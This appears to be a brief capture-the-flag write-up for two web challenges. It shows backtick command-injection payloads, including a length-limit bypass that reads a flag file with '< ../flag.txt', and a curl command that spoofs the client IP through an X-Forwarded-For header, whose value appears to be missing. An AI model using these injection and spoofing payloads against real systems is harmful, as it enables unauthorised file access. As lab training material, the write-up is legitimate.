

It is simple command injection in the input box we can use ` characters


all commands have to be enclosed in `` chars

now if we list files using


we can see index.php when we

`cat index.php`

we can see the code! certain characters are blacklisted we can only enter command less that 15 chars but there is no flag.txt here, if we simply execute

`ls ../`

then we can see flag.txt

`cat ../flag.txt`

fails because length of payload exceeds 15

payload to get flag :

linux redirection character! < is NOT blacklisted!

`< ../flag.txt`

Homeward Bound

In this challenge we were supposed to access internal files by spoofing client IP address, this can be done using X-Forwarded-For header

$ curl -H “X-Forwarded-For:” http://challenge.nahamcon.com:31428/